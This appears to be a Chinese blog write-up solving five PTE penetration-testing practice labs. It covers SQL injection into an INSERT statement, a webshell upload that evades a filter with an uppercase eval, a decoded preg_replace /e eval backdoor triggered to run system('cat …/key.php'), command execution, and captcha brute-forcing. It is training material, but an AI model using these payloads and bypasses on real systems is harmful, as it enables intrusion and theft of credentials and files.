pte练习题(34011-34015)

34011-34015

34011sql注入漏洞:

1.注册页找注入点,注册一个正常用户123,和一个符号用户’")#%–,发现可以注册,说明注册页无注入点。
2.发表页面
这里使用符号用户进行发表,提示失败说明此页面包含用户名,且含有注入点,换一个用户进行发表。
在这里插入图片描述
这里使用的是insert语句,应该是insert(‘’,‘’,‘’)格式,所以尝试‘,‘)测试闭合:
使用单引号时失败,说明是单引号
‘)-- 失败接着测试‘,‘’)-- 成功,说明内容后边还有一个插入的内容,根据插入未显示以及不同用户不能相互查看可推测是用户名。
测试:
‘,‘123’)–
在这里插入图片描述
成功显示,但是由于两个注入点都无法进行完整注入,接着对title进行测试:
title=tit’,‘concom’,‘123’)-- &content=con1
成功显示
在这里插入图片描述
因此可对concom字段处进行注入:
查库:
在这里插入图片描述

查表:
select group_concat(table_name)from information_schema.table where table_schema=‘2web’
在这里插入图片描述
其中要对关键词进行大小写空格绕过
在这里插入图片描述
查users1表的内容
查字段:
在这里插入图片描述
在这里插入图片描述
最后直接查用户名为admin时的password
在这里插入图片描述
在这里插入图片描述

34012文件上传

题干提示答案就在根目录下key.php文件中。
上传图片马失败,说明是内容过滤
抓包对内容进行测试
在这里插入图片描述
将eval进行大写即可对其进行绕过,并将后缀名改为pht,用蚁剑连接
在这里插入图片描述

34013文件包含

答案就在根目录下key.php文件中。
进行文件包含读取----->ERROR说明包含指令不行
查看当前页面view.html的源码,发现有一行代码
在这里插入图片描述
对其进行分析:

<?php 
@$a = $_POST['Hello']; 
if(isset($a)){ 
@preg_replace("/\[(.*)\]/e",'\\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10=')); 
} 
?>
//执行参数是Hello进行传参
//preg_replace是替换函数:
// /e代表把匹配的当成PHP脚本执行
//base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10=')解码后:[@eval(base64_decode($_POST[z0]));]整个正则就是将这个进行php代码执行,
//包含两个参数Hello=1&z0=base64(phpinfo();)包含页面进行执行

利用系统执行代码查看key.php:
Hello=1&z0=system(‘ls …/’);
在这里插入图片描述

Hello=1&z0=system(‘cat …/key.php’);
在这里插入图片描述
查看源码
在这里插入图片描述

34014命令执行

送分题
sort …/key.php
在这里插入图片描述

34015验证码爆破

抓取两个包,一个数据包一个验证码请求包,将数据包for,验证码包drop,验证码不再刷新。
对数据包进行爆破,只对密码进行爆破即可
在这里插入图片描述
得到密码

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值